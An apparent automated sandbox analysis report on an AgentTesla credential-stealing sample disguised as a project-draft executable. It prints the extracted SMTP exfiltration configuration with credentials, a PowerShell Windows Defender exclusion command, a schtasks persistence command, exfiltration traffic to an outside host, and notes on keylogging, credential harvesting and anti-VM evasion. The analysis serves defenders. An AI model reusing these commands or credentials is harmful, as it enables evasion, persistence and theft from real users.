Loading ...

Play interactive tourEdit tour

Windows Analysis Report CO DRAFT Al Zaytounah project.exe

Overview

General Information

Sample Name:CO DRAFT Al Zaytounah project.exe
Analysis ID:532717
MD5:80cec5a926b23b289405700083013293
SHA1:fbe4b963e5247b52a42ef7485fc2006a77ecbe3a
SHA256:556b249f8b149348daec751c26360cb2cb5abc61a5f067281e14d771a4817086
Tags:exe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • CO DRAFT Al Zaytounah project.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe" MD5: 80CEC5A926B23B289405700083013293)
    • powershell.exe (PID: 6156 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5700 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "milli@emremetal.xyz", "Password": "TB@h;x2zl*5c", "Host": "server126.web-hosting.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.0.CO DRAFT Al Zaytounah project.exe.400000.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              8.0.CO DRAFT Al Zaytounah project.exe.400000.6.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.CO DRAFT Al Zaytounah project.exe.439cad8.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.CO DRAFT Al Zaytounah project.exe.439cad8.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.CO DRAFT Al Zaytounah project.exe.43668b8.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicius Add Task From User AppData TempShow sources
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe" , ParentImage: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe, ParentProcessId: 6960, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp, ProcessId: 5700
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe" , ParentImage: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe, ParentProcessId: 6960, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, ProcessId: 6156
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe" , ParentImage: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe, ParentProcessId: 6960, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, ProcessId: 6156
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132829331607808173.6156.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "milli@emremetal.xyz", "Password": "TB@h;x2zl*5c", "Host": "server126.web-hosting.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: CO DRAFT Al Zaytounah project.exeVirustotal: Detection: 25%Perma Link
                      Source: CO DRAFT Al Zaytounah project.exeReversingLabs: Detection: 31%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\eyjBzJU.exeReversingLabs: Detection: 31%
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.2.CO DRAFT Al Zaytounah project.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: CO DRAFT Al Zaytounah project.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: CO DRAFT Al Zaytounah project.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49803 -> 198.54.126.165:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49804 -> 198.54.126.165:587
                      Source: Joe Sandbox ViewIP Address: 198.54.126.165 198.54.126.165
                      Source: global trafficTCP traffic: 192.168.2.4:49803 -> 198.54.126.165:587
                      Source: global trafficTCP traffic: 192.168.2.4:49803 -> 198.54.126.165:587
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpString found in binary or memory: http://CjhhBN.com
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931660638.0000000002E91000.00000004.00000001.sdmpString found in binary or memory: http://server126.web-hosting.com
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931681747.0000000002E9D000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931660638.0000000002E91000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931642150.0000000002E89000.00000004.00000001.sdmpString found in binary or memory: https://KXS9NVa7QJoby.org
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpString found in binary or memory: https://KXS9NVa7QJoby.org$
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: server126.web-hosting.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.680792720.0000000001660000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007bBA29DE82u002d4BC0u002d43FCu002d84DDu002d78B6F3A69E9Du007d/B1C3D179u002dE03Bu002d4108u002dB4C7u002d1C8785639810.csLarge array initialization: .cctor: array initializer size 11963
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007bBA29DE82u002d4BC0u002d43FCu002d84DDu002d78B6F3A69E9Du007d/B1C3D179u002dE03Bu002d4108u002dB4C7u002d1C8785639810.csLarge array initialization: .cctor: array initializer size 11963
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bBA29DE82u002d4BC0u002d43FCu002d84DDu002d78B6F3A69E9Du007d/B1C3D179u002dE03Bu002d4108u002dB4C7u002d1C8785639810.csLarge array initialization: .cctor: array initializer size 11963
                      Source: CO DRAFT Al Zaytounah project.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeCode function: 0_2_0186C5B4
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeCode function: 0_2_0186E913
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeCode function: 0_2_0186E918
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCBlsREajdILFHjttXQQvPBUPXWSdA.exe4 vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.685764970.00000000065B0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.680527861.0000000000F38000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIdentifierAuthori.exe4 vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000003.665055094.0000000001739000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIdentifierAuthori.exe4 vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.680792720.0000000001660000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCBlsREajdILFHjttXQQvPBUPXWSdA.exe4 vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000000.678239698.0000000000778000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIdentifierAuthori.exe4 vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.929965429.0000000000E2A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCBlsREajdILFHjttXQQvPBUPXWSdA.exe4 vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.929638772.0000000000B38000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exeBinary or memory string: OriginalFilenameIdentifierAuthori.exe4 vs CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: eyjBzJU.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: CO DRAFT Al Zaytounah project.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: eyjBzJU.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: CO DRAFT Al Zaytounah project.exeVirustotal: Detection: 25%
                      Source: CO DRAFT Al Zaytounah project.exeReversingLabs: Detection: 31%
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile read: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeJump to behavior
                      Source: CO DRAFT Al Zaytounah project.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe "C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe"
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile created: C:\Users\user\AppData\Roaming\eyjBzJU.exeJump to behavior
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile created: C:\Users\user\AppData\Local\Temp\tmp79A6.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/9@1/1
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeMutant created: \Sessions\1\BaseNamedObjects\oNRWzrcwgOKXibQlcjDPRoQyXB
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5736:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: CO DRAFT Al Zaytounah project.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: CO DRAFT Al Zaytounah project.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: CO DRAFT Al Zaytounah project.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: CO DRAFT Al Zaytounah project.exe, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: eyjBzJU.exe.0.dr, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.CO DRAFT Al Zaytounah project.exe.ec0000.0.unpack, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.CO DRAFT Al Zaytounah project.exe.ec0000.0.unpack, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.700000.13.unpack, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.700000.2.unpack, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.700000.11.unpack, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.700000.1.unpack, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 8.0.CO DRAFT Al Zaytounah project.exe.700000.3.unpack, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeCode function: 0_2_0186E318 push esp; iretd
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeCode function: 0_2_0186D644 pushad ; ret
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeCode function: 8_3_00EFB7F1 push eax; retf
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeCode function: 8_3_00EFBAB6 pushfd ; retf
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeCode function: 8_3_00EFBA69 pushfd ; retf
                      Source: CO DRAFT Al Zaytounah project.exeStatic PE information: 0xB8CA9CB1 [Thu Mar 29 22:35:29 2068 UTC]
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.82200037315
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.82200037315
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile created: C:\Users\user\AppData\Roaming\eyjBzJU.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
